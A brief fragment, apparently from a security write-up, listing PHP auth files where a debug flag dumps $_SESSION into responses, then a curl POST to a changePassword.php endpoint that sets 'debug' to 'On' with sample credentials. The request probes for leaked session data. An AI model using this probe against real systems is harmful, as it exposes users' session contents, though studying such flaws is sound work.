{auth/sessionCreate.php:57:if ($debug) $data->_SESSION = $_SESSION;auth/sessionLogout.php:6:if ($debug) {auth/sessionLogout.php:31:if( $debug ) $data->_SESSION = $_SESSION;auth/sessionValidate.php:6:if ($debug) {auth/sessionValidate.php:45:if( $debug ) $data->_SESSION = $_SESSION;$ curl -X POST "http://192.168.73.31/auth/changePassword.php" \> -d "{\> \"appid\":\"1\",\> \"user\":\"teppei\",\> \"oldpass\":\"123456\",\> \"newpass\":\"654321\",\> \"forcelogout\":\"?\",\> \"debug\":\"On\"\> }"